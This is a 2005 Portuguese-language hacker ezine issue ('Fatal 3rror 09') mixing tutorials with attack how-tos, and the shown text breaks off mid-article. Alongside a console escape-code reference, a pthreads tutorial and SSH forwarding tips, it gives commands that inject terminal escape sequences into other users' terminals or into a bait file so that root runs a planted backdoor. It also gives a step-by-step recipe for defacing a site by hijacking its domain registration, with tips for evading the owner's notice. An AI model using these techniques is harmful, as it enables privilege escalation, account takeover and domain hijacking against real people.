Fatal 3rror(0009): file not found: /dev/stderr !!! _ __ ___________________________ __________________________ ____ \ ______ _ _______ _______ \___ _______by_Cheat_Struck__/ / /_ ____ ________ _____ / / /___ ____ ____ ____ / / _ \__ __/ _ \/ / /_ / _ \ _ \ \ _ \ / _ / / _ / /__ / / _ / _ / _/ / _ / __/ / __/ / / __/______\____/ / _\ / _\____/ / _\ )/ )/ )/ )/ )/ )/ ' ' ' ' ' ' "Boomerang! O que eh bom sempre volta!!" Cartoon Network 26/11/2005 Fatal 3rror 09 (Edicao de Colecionador) by Cheat Struck .o http://struck.8m.com .o cheatstruck@hotmail.com _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________00. Topicos _________________________________ ______________ _____.___ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ .00. Topicos / Cheat Struck .01. Introducao / Cheat Struck .02. Tips / Cheat Struck .03. Konsole Kodes / Cheat Struck .04. Defacing... / Cheat Struck .05. Posix Threads / Cheat Struck .06. Forwarding with SSH T3kn33k / Cheat Struck .07. Google Scanner / Cheat Struck e hUNTEr .08. Hacker Power Elite Zine 1.0 / _liquid .09. Manual definitivo de como roba sorvete da kib0n / ZaNnDoN .10. Receita de bolo: Como obter root local em poucos segundos... / Cheat Struck .11. Banda Larga sem provedor... / Cheatt Sruck .12. Acessando bancos mysql sem conta.... / Ceat Sthruck .13. Gerador de numeros de cartoes para cells pre-pagos / Ceeet Sttttk .14. Super Leet Programs / Cheat Strike .15. Compartilhando Terminais - Screen / Chea Stru .16. Ownando via Grub / Sr. Cheat Struck .17. 3-m4ilz / Shit Struck .18. Th3 3nd??? / Cht Stk _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________01. Introducao _________________________________ ______________ _____.___ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ Porra!! Antes que comecem a me xingar... sim.. eu sei que demorou pra caralho pra eu toma vergonha na cara e junta um monte de texto de merda e lanca a edicao 09 da fatal 3rror... Mas a ae.. quentinha da venda direto pra voces. Se nao gostarem, eh compreensivel... afinal essa edicao assim como a anterior foi composta de textos que ja estavam esquecidos e incompletos que achei no meu antigo note... Alguns ateh escrevi a pouco, mas enquanto cagava entao da um desconto... Ta.. eu sei que depois de mais de 2 anos de espera por uma edicao da zine, era de se esperar que sairiam materias super-ultra-hackas! Mas vou deixa claro aqui de uma vez por todas para nao ser mais encomodado com essas perguntas no meu email. A ZINE NAO ACABOU! NEM VAI ACABAR! O unico problema eh que eu nao abandonei o mundo hacko, mas me afastei afu em questao de trabalho, facul, mulheres e principalmente a bebida... entao nao sobrou mto tempo para ficar as noites em claro no irc, nem aprendendo coisas novas, mto menos escrevendo materias para a zine. Do pessoal das antigas apenas mantenho contato com poucos por e-mail. E a maioria tb ta meio atucanados e nao tem tempo para ajudar com a zine. Eu acabo tendo que escrever tudo sozinho, portanto demora "um pouquinho" para sair as proximas edicoes. Se os leitores piruleetos ajudassem ia ser mais facil. Bem.. concluindo: A zine nao acaba ateh eu dizer que acabou. Mas enquanto eu nao me formar (nao falta mto) ou nao me internarem, vai demora pra sair as proximas edicoes... Mas qdo voce menos espera, ali vai estar uma nova edicao da F3 fresquinha para voce! _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________02. Tips _________________________________ ______________ _____.___ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ Quem escreveu nessa edicao? Cheat Struck Onde baixar outras edicoes da Fatal 3rror? http://struck.kit.net http://struck.8m.com http://www.txt.org http://4x10m4.vila.bol.com.br http://www.hackemate.com.ar/ http://cla777.250free.com http://www.mild7.hpg.ig.com.br/ Como extrair programas deste arquivo? [struck@localhost ~]$ tar -zxvf f3-07.tgz [struck@localhost ~]$ cd f3 [struck@localhost f3]$ gcc extract.c -o extract [struck@localhost f3]$ ./extract f3-07.txt [struck@localhost f3]$ _____________ ___________________ ________________________ [Funny QUOTES] alguem que use conectiva 8 pode me passar o /dev/fd0 por favor? _____________ ___________________ ________________________ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________03. Konsole Kodes _________________________________ ______________ _____.___ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ Console codes sao caracteres de controle usados pelo terminal para tratar algumas funcoes do teclado (como Enter, Backspace, Tab), sons (beeps), cores, e outras coisinhas que veremos. O caracter de controle mais usado aqui eh o ESC. Ele inicia uma sequencia que deve ser escrita da seguinte forma... Ex: ESC [ 1 m struck@f3:~$ echo ^[[1m ou struck@f3:~$ echo -e "\033[1m" ou struck@f3:~$ echo -e "\x1b[1m" ou struck@f3:~$ echo -e "\e[1m" O caracter ESC pode ser representado por ^[ (Ctrl+V ESC) ou usando codigos de barra invertida, podemos representa-lo com \033 (em octal) ou \x1b (em hexadecimal) ou ainda com \e (nao suportado por todos compiladores). Aki vai uma lista compilada por mim de console codes, incluindo ESC sequences que funcionam em console, vt100, vt102 e xterms: BELL : \x07 \a - Beep BS : \x08 \b - Backspace HT : \x09 \t - Tabulacao Horizontal LF : \x0a \n - Alimentacao de linha (Line Feed) VT : \x0b \v - Tabulacao Vertical FF : \x0c \f - Alimentacao de formulario (Form Feed) CR : \x0d \r - Retorno de carro (Carriage Return) SO : \x0e - Habilita caracteres G1 SI : \x0f - Habilita caracteres G0 CAN : \x18 - ^X (ctrl+X) SUB : \x1a - ^Z (ctrl+Z) Sequencias de interrupcao ESC : \x1b \e \E - Inicia uma ESC sequence (veja mais abaixo) DEL : \x7f - Delete (normalmente ignorado) CSI : \x9b - Inicia uma CSI sequence (equivale a ESC [) Sequencias ESC: ESC c - Reset ESC l - Memory lock. Protege a memoria acima do cursor. (xterm) ESC m - Memory unlock. (xterm) ESC n - Usa caracteres G2. (xterm) ESC o - Usa caracteres G3. (xterm) ESC D - Linefeed. ESC E - Newline. ESC F - Coloca cursor na parte baixa a esquerda da tela. ESC H - Seta o tab para parar no coluna corrente. ESC M - Linefeed reverso. ESC N - Seleciona caracter G2 para o proximo caracter. (xterm) ESC O - Seleciona caracter G3 para o proximo caracter. (xterm) ESC P - Device control string (acaba com ESC \). ESC X - Inicia a string. ESC Z - DEC private identification. O kernel retorna: ESC[?6c = "eu sou um vt102"; ESC[?1;2c ="eu sou um vt100 com video avancado" (xterm). ESC 7 - Salva o estado corrente (cordenadas do cursor, atributos, character sets). ESC 8 - Restaura o estado mais recente salvado. ESC [ - Inicia sequencia CSI (Control Sequence Introducer). ESC [ @ - Insere caracteres vazios. ESC [ A - Move cursor linhas para cima. ESC [ B - Move cursor linhas para baixo. ESC [ C - Move cursor colunas para direita. ESC [ D - Move cursor colunas para esquerda. ESC [ E - Move cursor linhas pra baixo na coluna 1. ESC [ F - Move cursor linhas para cima na coluna 1. ESC [ G - Move cursor para coluna na linha corrente. ESC [ ; H - Move cursor para ;. ESC [ J - Limpa o display. = 1 - Limpa a partir do cursor. = 2 - Limpa todo o display. ESC [ K - Limpa a linha. = 1 - Apaga a partir do cursor. = 2 - Apaga toda a linha. ESC [ L - Insere linhas vazias. ESC [ M - Deleta linhas. ESC [ P - Deleta caracteres na linha corrente. ESC [ ;;;; T - Inicia mouse tracking Hilite. ESC [ X - Apaga caracteres na linha corrente. ESC [ a - Move cursor colunas para direita. ESC [ c - DEC private identification (o mesmo que ESC Z). ESC [ d - Move cursor para linha na coluna corrente. ESC [ e - Move cursor linhas para baixo. ESC [ ; f - Move cursor para ;. ESC [ g - Tab Clear. = 0 - Limpa tabulacao na posicao corrente. = 3 - Deleta todas tabulacoes. ESC [ h - Define Modo. = 3 - Mostra caracteres de controle. = 4 - Seta em modo de insercao. = 20 - Automaticamente encerra um echo com LF, VT ou FF+CR. ESC [ l - Reinicia Modo. tem mesmos valores anteriores. ESC [ ;;... m - Define atributos SGR. = 0 - Reset. = 1 - Negrito. = 2 - Half-bright. = 4 - Sublinhado. = 5 - Piscando. = 7 - Reverse video (selecionado). = 10 - Reseta mapeamento selecionado e algumas flags . = 11 - Seta display control flag e reseta toggle meta flag. = 12 - Seta display control flag e toggle meta flag. = 21 - Seta intensidade normal (nao compativel com ECMA-48) = 22 - Seta intensidade normal. = 24 - Desliga sublinhado. = 25 - Desliga piscando. = 27 - Desliga reverse video. = 30 - Preto. = 31 - Vermelho. = 32 - Verde. = 33 - Laranja. = 34 - Azul. = 35 - Rosa. = 36 - Azul claro. = 37 - Branco. = 38 - Liga underscore. = 39 - Desliga underscore. = 40 - Fundo preto. = 41 - Fundo vermelho. = 42 - Fundo verde. = 43 - Fundo laranja. = 44 - Fundo azul. = 45 - Fundo rosa. = 46 - Fundo azul claro. = 47 - Fundo branco. = 49 - Fundo padrao. ESC [ n - Reporta Status. = 5 - Reporta status do device. ESC [ 0 n = "Terminal OK". = 6 - Reporta posicao do cursor. Responde ESC [ y ; x R onde x,y eh a localizacao do cursor. ESC [ q - Seta LEDs do teclado. = 0 - desliga todos LEDs. = 1 - liga Scrool Lock LED. = 2 - liga Num Lock LED. = 3 - liga Caps Lock LED. ESC [ ; r - Seta a regiao de scrolling para linhas e . ESC [ s - Salva a localizacao do cursor. ESC [ u - Recupera a localizacao do cursor. ESC [ x - Requesita parametros do terminal. ESC [ ` - Move cursor a coluna na linha corrente. ESC [ ; ] - Sequencias particulares de console. = 1 - Seta cor de sublinhado. = 2 - Seta cor de dim. Cores estao em parametros SGR: 0 = preto, 1 = vermelho, 2 = verde, 3 = marrom, 4 = azul, 5 = rosa, 6 = azul claro, 7 = branco. = 8 - Faz das cores atuais atributos padroes. = 9 - Ativa o protetor de tela em minutos. = 10 - Seta frequencia em Hz do beep. = 11 - Seta duracao em msegundos do beep. = 12 - Altera terminais do console (mesmo que alt+f1 alt+f2...) = 13 - Desativa protetor de tela. = 14 - Seta intervalo em minutos de queda do VESA. ESC [ ? h - Seta modos privados DEC. = 1 - Envia um prefixo ESC 0 antes do ESC [. = 2 - Seta G0-G3 com US ACII. = 3 - Altera de 80 para 132 colunas. Isto deve ser usado junto com um programa tipo resizecons para mudar os registradores de hw da placa de video. = 5 - Seta modo reverse-video. = 6 - Cursor vai para o alto a esquerda. = 7 - Caracteres graficos sao usados a partir da proxima linha. = 8 - Liga autorepreat do teclado. = 9 - Reporta Mouse X10 (clique no terminal para testar). = 25 - Torna cursor visivel. = 38 - Entra no modo Tektronix. = 40 - Inicia modo 80 132. = 44 - Liga Margin Bell. = 45 - Modo Reverse-wraparound. = 46 - Inicia Logging. = 47 - Usa tela de buffer alternada. = 1000 - Reporta Mouse X11. = 1001 - Usa mouse tracking Hilite. ESC [ ? l - Reseta modos privados DEC. tem mesmos valores anteriores. ESC [ ? r - Recupera valores do modo privado DEC salvos em . ESC [ ? s - Salva valores do modo DEC privado em . ESC % - Inicia sequencia de selecao de caracteres: = @ - Seleciona padrao (ISO 646 / ISO 8859-1) = G - Seleciona UTF-8 = 8 - Seleciona UTF-8 (obsoleto) ESC # 8 - DEC screen alignment test - enche a tela com E's. ESC ^ - Mensagem privada (acaba com ESC \). ESC \ - Terminador de string. ESC ( - Inicia sequencia de definicao de caracteres G0: = A - Seleciona mapeamento tipo UK = B - Seleciona padrao US ASCII (mapeamento ISO 8859-1) = 0 - Seleciona mapeamento graficos vt100 = U - Seleciona mapeamento nulo. = K - Seleciona mapeamento do usuario. O mapa que eh carregado pelo programa mapscrn. ESC ) - Inicia sequencia de definicao de caracteres G1. recebe mesmos valores anterior. ESC * - Inicia sequencia de definicao de caracteres G2. (no xterm) recebe mesmos valores anterior. ESC + - Inicia sequencia de definicao de caracteres G3. (no xterm) recebe mesmos valores anterior. ESC > - Seta teclado modo numerico. ESC = - Seta teclado modo aplicativo. ESC | - Usa caracteres G3 como GR. Nao tem diferenca visivel no xterm. ESC } - Usa caracteres G2 como GR. Nao tem diferenca visivel no xterm. ESC ~ - Usa caracteres G1 como GR. Idem. ESC ] - Inicia sequencia OSC (Operating System Command) ESC ] P nrrggbb - Seta paleta com os parametros em 7 digitos hexadecimais depois do P. Aki n eh a cor (0-16), e rrggbb indica os valores RGB. ESC ] R - Reseta paleta. ESC ] ; BEL - OSC particulares do xterm. = 0 - Seta nome do icone e titulo da janela para . = 1 - Seta nome do icone para . = 2 - Seta nome da janela para . = 46 - Muda o arquivo de log para . = 50 - Seta fonte para . Agora, como se divertir usando console codes? Voce ja deve te-los usados para colorir saidas dos programas neh? printf("\x1b[34;41m Hello color world!\n"); Lembram o programa tilt.c da edicao passada (negocio tosco), o que ele fazia era usar os caracteres de controle SO (Shift Out)(\x0e) e SI (Shift In)(\x0f) para mudar o character set de G0 para G1 e vice-versa. echo -e "\x0e" echo -e "\x0f" Ao invez disso, voce pode redefinir os caracteres G0, assim o programa tilt.c nao pode fazer nada. echo -e "\x1b(0" Lembrando que para voltar ao normal voce pode usar o programa reset para reiniciar as variaveis do terminal. Se estivermos no console, podemos fazer coisas interessantes como compor musiquinhas usando beeps =) <++> ccodes/britney.c #include #define X 100000 int main(int i) { i=0; fprintf(stdout,"00p5 3y3 d1d 1t 4g41n\n\e[11;300]"); fflush(stdout); set(210+i,10,2); usleep(X*2); set(170+i,10,2); set(160+i,10,2); set(170+i,10,2); set(190+i,10,2); set(170+i,10,2); usleep(X*4); } int set(int som, int tipo, int tempo) { fprintf(stdout,"\e[%d;%d]\a",tipo,som); usleep(tempo*X); fflush(stdout); fprintf(stdout,"\e[%d;%d]\a",tipo,som); usleep(tempo*X); fflush(stdout); } <--> Que tal fazer um acompanhamento com LEDs do teclado?? <++> ccodes/leds.sh #!/bin/sh L=0 G=5 echo -e "L3ds danc3!\x1b[0q\x1b[1A" while [ $L -lt $G ] do echo -e "\x1b[2q\x1b[1A" ; sleep 1 echo -e "\x1b[3q\x1b[1A" ; sleep 1 echo -e "\x1b[1q\x1b[1A" ; sleep 1 echo -e "\x1b[3q\x1b[1A" ; sleep 1 L=`expr $L + 1` done echo -e "\x1b[0q" <--> Dentre outras coisas da ainda pra alterar os terminais com ESC sequences do mesmo modo que usamos alt+F1, alt+F2, alt+F3,... echo -e "\x1b[12;1]" echo -e "\x1b[12;2]" echo -e "\x1b[12;3]" Que tal irmos para a interface agora? echo -e "\x1b[12;7]" No xterm tambem eh possivel brincar com coisas que soh workam aki. Como por exemplo mudar o titulo da janela: echo -e "\x1b]2; fecha a janela que ta entrando vento \a" Se tiver alguem com o mesmo usuario conectado voce pode avacalhar com o terminal dele enviando as sequencias pro device especifico. No exemplo enche de E a tela do usuario logado no pts2: echo -e "\x1b#8" >> /dev/pts/2 Ou ainda podemos forca-lo a executar algum programa... echo -e "\x1b[5n" >> /dev/pts/2 Isso faz o kernel responder "ESC [ 0 n" se estiver tudo bem com o terminal o que acaba colando o caracter 'n' na linha de comando da shell. Se por acaso o usuario der um Enter depois disso executara' o programa "n". O problema aki eh fazer com que o programa "n" (backdoor ou script de comandos que voce quer que o usuario execute) esteja no PATH do usuario. Se o sistema concatena ao PATH o caminho "./" para executar programas no diretorio atual, entao a coisa fica facil. Eh soh descobrir o diretorio em que o usuario se encontra e colocar o "n" la depois enviar a string. Tambem podemos usar isso para tentar ganhar root na maquina. Basta colocarmos a mesmo string dentro de um arquivo com um nome bem sugestivo como "hackedpasswords" e setarmos modo de lida somente para o root. cat /etc/passwd > /tmp/hackedpasswords echo -e "\x1b[5n" >> /tmp/hackedpasswords Agora criamos no mesmo dir a backdoor /tmp/n com permissao de execucao para todos. Assim quando o root tentar dar um cat no /tmp/hackedpasswords sera' jogado "n" na shell fazendo-o executar nossa back caso ele de enter em seguida. Aqui tambem sera' preciso que o PATH esteje do nosso lado. Por hora eh soh. Divirta-se e seje criativo. _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________04. Defacing... _________________________________ ______________ _____.___ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ Essa materia eh soh pros maninho hacker q fazem deface... Pra nao ter neguinho etico reclamando vou esclarecer q essa materia nao deve ser lida por script kiddies e caso voce ponha em pratica as coisas aki que seje apenas por aprendizado ou caso voce precise mesmo expor algumas ideias para o resto do povo ler. Pra comecar, fazer deface e' um negocio feio de se fazer. Principalmente depois que voce consegue r00t numa box, qdo voce faz deface, acaba perdendo a box em alguns dias. Nao importa se vc deixou uma back la no sistema ou se ele era mto antigo, pq um tecnico em seguranca conseguira encontra-lo alguma hora. Entao aconselho que caso voce tenho ownado uma box, fike quietinho la para que nao seje chamado nenhum analista de seguranca para encontrar a crianca que andou baguncando com as paginas do servidor. Mas voce e' cabecao e seu negocio eh deface. Bom... essa materia vai servir para mostrar a gurizada que nao e' tao dificil de se fazer um deface quanto parece. A primeira tentativa sempre eh atacar diretamente o servidor. Assim, caso voce queira defacear o www.hacker.com.br, voce tenta ownar o hacker.com.br ou o servidor que ele se encontra. Ainda no exemplo suposto, digamos q o hacker.com.br ta hospedado na brtdata. Entao voce tenta ownar a brtdata. Mas ae voce eh lamer demais para conseguir ownar a brtdata. Entao voce desiste de fazer o deface, afinal se mostrou incopetente para ownar o servidor do site que queria defacear. Agora que voce nota a diferenca do hacker para um scriptkiddie. A reacao mais normal num scriptkiddie eh desistir do site alvo e usar seus scans na rede ate' achar uma maquina que ele tenha capacidade de ownar pois seu alvo principal era demais para ele. Ja o hacker o que faz?? Ele continua tentando por outros meios... Como o hacker nao conseguiu ownar o hacker.com.br, ele pensa: "Tudo o que eu quero eh faze um deface... C eu conseguisse fazer isso sem precisar ownar o servidor seria o canal." Ae ele lembra que em redes TCP como a internet existem coisinhas chamadas DNSs que servem para direcionar um endereco a um IP. E se ele atacasse o DNS ao invez do servidor http? Vamos direto a fonte! Mas o problema eh que o servidor DNS tb e' da brtdata.com.br e tb ta mto dificil de conseguir ownar. Entao vamos mais abaixo ainda... Vamo ate' o registro.br e procuramos pelo hacker.com.br. Ali esta ele! Ali aparece o nome completo de quem o cadastrou, login, endereco e, claro, os servidores DNS que contem informacoes sobre o dominio. Ae descobrimos que sabendo o RG da pessoa que registrou o dominio e' possivel alterar o e-mail do cadastro. E com isso podemos fazer o pedido de lembrete da senha. Se o lembrete da senha nao adiantou pra nada, encaminhamos o e-mail exatamente como esta para o registro.br que eles alteram a senha e te enviam a nova senha. Com isso conseguimos alterar o cadastro e trocamos os servidores DNS para este dominio para algum que nos tenhamos inserido o direcionamento para uma page defacement. Achu q leva umas 12hs pra faze efeito depois de alterado o cadastro no registro.br. Entao o hacker agora dorme tranquilo e amanha qdo for conectar vai ver sua page defacement. Os donos da pagina vao ficar loucos qdo verem que seus servidores estao em ordem mas sua pagina nao volta ao normal. Resumindo: Voce faz o deface em uma outra pagina e muda o DNS para apontar o endereco www.hacker.com.br para esta pagina. Se voce leu todo o texto acima e nao entendeu como que funciona provavelmente voce eh um lamer, um scriptkiddie ou um novato, pois tudo o que consta neste texto e' basico e simples de ser entendido por um hacker. A tecnica funciona, mas por que nao e' feita? Eis alguns motivos... Primeiro e mais importante: Todo o hacker que se preze nao perde tempo fazendo defaces. Segundo: Script kiddies nao tem capacidade de fazer isso pois nao conseguem entender o basico do TCP/IP. Negocio deles e' ter tudo pronto. 3o: A seguranca do registro.br eh bastante alta quanto a invasores. Eles fazem log de tudo e caso voce erre em algum passo desta tecnica, eles avisam o dono do dominio da tentativa de acesso passando-lhe seu ip, data/hora. Por ultimo: Se voce tiver seguro o suficiente para fazer tal tecnica, ainda necessita ter um servidor DNS ownado para que possa cadastrar o endereco (no nosso ex: hacker.com.br) apontando-o para uma page ja defaceada. Eu dei os passos como receita de bolo pq sei que esta nao eh uma tecnica que sera usado por scriptkiddies pois eles nao tem nocao nem coragem para fazer isso. O negocio deles e' rodar scriptzinho em servidores toscos. No caso dos hackos defacers, eu nao me preocupo pq o kra que tiver sako pra fazer um ataque desses quer mesmo falar alguma coisa no seu deface e nao apenas colocar "Free Kevin" na pagina =P. Eu fiz um ataque destes na empresa que trabalho apenas para testes, eh claro que nao direcionei o site para uma pagina defaced e sim para uma copia da pagina original. Como eu que controlo o setor de informatica la, sabia que nao ia da problema entao fiz apenas para testar a tecnica. Nao aconselho ninguem a faze-la pois como falei os logs na registro.br podem lhe levar ao xilindro'. =7 Outra coisa... certifique-se de que o dono da page nao leia seus emails por pelo menos 12 horas depois do ataque ou ele receberá o aviso da registro.br de que seu usuário logou e alterou os DNS de seus dominios. Concluindo: Neste texto mostrei a simplicidade que e' de fazer um deface. Logo deixo ao conceito de voces se o que diferencia um hacker de um scriptkiddie e' o fato dele fazer o deface ou de como faze-lo. _____________ ___________________ ________________________ [Funny QUOTES] o povo é muito imitão, ninguem nuca tinha visto esse negoço de por "xNICKx", desde quando eu coloquei isto, todo mundo do canal da minha escola me imita tu ve soh neh... tem algum hacker aqui? hehehh... eu vi alguem levantando... bora hackear esse canal? _____________ ___________________ ________________________ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________05. Posix Threads _________________________________ ______________ _____.___ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ Na edicao passada eu mostrei como usar threads em java. Bem, o pessoal comecou a reclamar pq java eh sux e o negocio eh continuar no bom e velho tradicional C. Entao ta neh, se nao da pra muda o cardapio da gurizada nao vamo mais meche no que ta bom. O kernel do linux implementa threads padrao posix que sera a que veremos nesta materia. 1. Introducao ------------- No linux, para fazermos uma programacao concorrente normalmente utilizamos o fork(). Com o fork criamos um novo processo filho exatamente igual ao pai e seu fluxo de execucao comeca a concorrencia a partir do ponto em que foi chamado. A vantagem de se usar fork() e' que nao precisamos nos preocupar com race conditions sobre a mesma memoria compartilhada. Afinal cada novo processo filho criado tera' uma nova area de memoria para sua execucao. O grande problema e' realmente o consumo grande de memoria. O daemon de http apache, por exemplo, ao ser inicializado cria inicialmente uns 5 filhos todos requisitando uma quantidade significante de memoria. Threads sao conhecidos como processos leves pois agem sobre a mesma area de dados e apenas seu fluxo de execucao e' passado para outro ponto da memoria. A thread criada agira' como um novo processo concorrendo com os demais rodando ao mesmo tempo no sistema. E' muito util tambem quando o compartilhamento de dados e' necessario, assim nao e' preciso utilizar outras tecnicas mais complicadas para passar dados de um processo ao outro. Apenas sera' necessario o controle de acesso sobre tal area para que nao ocorra sobrescrita de dados devido a race conditions. Para utilizar pthreads no nosso programa, temos que compila-lo utilizando as bibliotecas pthreads. Portanto lembre de ao compilar indicar ao compilador que ele vai usar a biblioteca da seguinte forma: ~$ gcc prog.c -oprog -lpthread Alem disso precisamos definir a header pthread.h para referencias as funcoes da biblioteca e tipo de dados: #include 2. Criando uma pthread ---------------------- Primeiro passo, declaramos as variaveis de controle para nossas threads: pthread_t t1, t2; Precisamos tambem da rotina que sera executada pela thread. Defina como uma funcao void * e podera' receber um argumento. Exemplo: void *start(char *nome) { int i; for (i=0; i<10; i++) { printf("%s conta %d\n",nome,i); usleep(10); } pthread_exit(0); } So' isso?? A principio sim... Ja podemos criar as threads: pthread_create(&t1, NULL, (void *) &start, "Thread 1"); pthread_create(&t2, NULL, (void *) &start, "Thread 2"); O segundo argumento da funcao acima define os atributos da thread. Se usarmos NULL a thread sera' criada com atributos padroes e comecara' a rodar a partir do momento de sua criacao. Ultimo detalhe para que o programa funcione: O programa principal nao pode ser encerrado antes das threads. Caso isso aconteca, as threads tentarao acessar uma area de memoria que pertencia ao processo ja finalizado e que agora esta livre e por tanto teremos um segmentation fault. Para controlar o encerramento da thread usamos: pthread_join(t1, NULL); pthread_join(t2, NULL); Onde o segundo argumento serve para salvar o retorno da thread. Usamos NULL quando nao nos interessa o retorno. Pronto! As threads estao prontas para funcionar. Observe e teste o seguinte programa exemplo: <++> pthread/pt1.c /* Lembre-se de compilar com: * gcc pt1.c -opt1 -lpthread */ #include #include #include void *run(char *name); int main() { pthread_t t1, t2; pthread_create(&t1, NULL, (void *) &run, "Thread 1"); pthread_create(&t2, NULL, (void *) &run, "Thread 2"); run("GOD"); pthread_join(t1, NULL); pthread_join(t2, NULL); return 1; } void *run(char *name){ int i; printf("Hello! I'm %s.\n",name); for (i=0;i<10; i++) { printf("%s says: eh %d papapa!\n",name,i); usleep(10); } pthread_exit(0); } <--> 3. Sincronisando com semaforos ------------------------------ Ao trabalharmos sobre a mesma area de memoria, precisamos de alguma coisa para controlar nosso acesso a esta area. Caso contrario teremos problemas de race conditions na memoria. O trecho do programa que trabalha em cima dessa memoria e' conhecido como Zona Critica e deve ser executado sozinho, sem que outras threads concorram com ele nakele momento. Para fazer este controle o padrao posix oferece um recurso bem simples porem util conhecido por semaphores. Os prototipos e variaveis de controle de semaphores estao no header: #include A variavel de semaforo e' declarada da seguinte forma: sem_t s1, s2; Para podermos usa-los dentro das threads, temos que inicializa-los antes que os threads comecem a rodar: sem_init(&s1,0,0); sem_init(&s2,0,0); Agora eles podem ser usados dentro das threads. Os semaforos funcionam como na vida real. Se estao "abertos", a execucao continua, se estao "fechados", a execucao para ate' que o semaforo abra novamente. Existem duas funcoes para esse controle: Thread 1 Thread 2 -------- -------- sem_wait(&s1); sem_wait(&s2); //zona critica //Zona critica sem_post(&s2); sem_post(&s1); A funcao sem_wait() espera que o sinal abra para continuar o fluxo de execucao. A funcao sem_post() abre o sinal do semaforo. Eles devem ser usados como no exemplo acima. Quando uma thread faz acesso a zona critica, ela deve esperar que a outra lhe de permissao para isso e vice-versa. Note que a principio as duas threads ficaram paradas pois uma espera o sinal da outra. Esta situacao e' conhecida como deadlock. Para evitar isso e' preciso que o programa principal abra um dos sinais para que as threads comecem a funcionar. Observe como funcionam os semaforos analizando e executando o proximo programa exemplo: <++> pthread/pt2.c /* Lembre-se de compilar com: * gcc pt2.c -opt2 -lpthread */ #include #include #include #include void *run1(); void *run2(); int i=0; //Variavel compartilhada pelas threads... sem_t s1,s2; //Semaforos para controle de acesso a variavel i... int main() { pthread_t t1, t2; sem_init(&s1,0,0); sem_init(&s2,0,0); pthread_create(&t1, NULL, (void *) &run1, NULL); pthread_create(&t2, NULL, (void *) &run2, NULL); sem_post(&s1); pthread_join(t1, NULL); pthread_join(t2, NULL); return 1; } void *run1(){ printf("Hello! I'm Thread 1.\n"); while( i<10 ) { sem_wait(&s2); /**** Zona Critica ****/ printf("Thread 1 says: eh %d papapa!\n", i++); usleep(10); /**** Fim da zona critica ****/ sem_post(&s1); } pthread_exit(0); } void *run2(){ printf("Hello! I'm Thread 2.\n"); while( i<10 ) { sem_wait(&s1); /**** Zona Critica ****/ printf("Thread 2 says: eh %d papapa!\n", i++); usleep(10); /**** Fim da Zona Critica ****/ sem_post(&s2); } pthread_exit(0); } <--> 4. Conclusao ------------ A principio e' isso. Nao vou me aprofundar aki falando de atributos, prioridades, entre outras coisas porque esta zine nao e' sobre programacao. Se quizer estudar mais, ha man pages de funcoes para pthreads para voce ler... _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________06. Forwarding with SSH T3kn33k _________________________________ ______________ _____.___ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ Tecnica simples e sem muitas explicacoes: Va a um shell e execute: struck@f3:~$ ssh some_host -L22:some_host:22 Assim, enquanto vc estiver conectado ao some_host, se alguem quizer conectar no seu ssh (porta 22) vai cair no ssh do some_host. Mas nao acaba por ae... struck@f3:~$ ssh some_host -L21:some_host:21 Com isso qdo conectarem ao ftp(porta 21) do seu host, vai cair no ftp do some_host. Cabo? nao... struck@f3:~$ ssh some_host -L7374:some_host:23 Agora qdo alguem tentar conectar na sua porta 7374, cai no telnet (porta 23) do some_host. Por fim, voce pode fazer algo como: struck@f3:~$ ssh 0 -L7374:some_host:22 Agora voce nao precisa estabelecer a coneccao com o some_host para forwardar a porta 7374 para o ssh (porta 22) dele. Voce conecta no seu proprio sshd. Mas ae vc quer forwardar a sua porta 22 para a dele soh que nao consegue por que o daemon sshd ja esta bindando sua porta 22. O que voce faz? struck@f3:~$ killall sshd struck@f3:~$ sshd -p24 struck@f3:~$ ssh 0 -p24 -L22:some_host:22 Voalah! qdo conectarem no seu ssh (porta 22) a conexao eh jogada no ssh do some_host. O que foi feito aki eh rodar o daemon sshd na porta 24 na sua maquina. _____________ ___________________ ________________________ [Funny QUOTEs] eu so quero colocar no topico que isto foi hackeado e apagar todos os ops MafiaNet : pra que isso?? soh de onda? desafios _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck e hUNTEr _____________07. Google Scanner _________________________________ ______________ _____.___ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ Vou colocar junto a esta materia um texto escrito por hUNTEr para ter uma nocao melhor de como usar o programa em seguida. GOOGLE: FERRAMENTA HACKER ------------- - by hUNTEr - ------------- Bom, que o google.com ja foi parte fundamental em varios hackings famosos quase todo mundo ja sabe... o problema eh que nunca encontrei um artigo que explicasse como eh possivel tranformar o google.com em uma poderosa ferramentahacking. Por este motivo decidi escrever um artigo basico sobre isto. Utilidades: Eh possivel utilizar o google.com para encontrar paginas de administracao que nao possuem nenhuma protecao, e que por este motivo sao colocadas escondidas em servidores web. Tambem eh possivel encontrar arquivos de database, 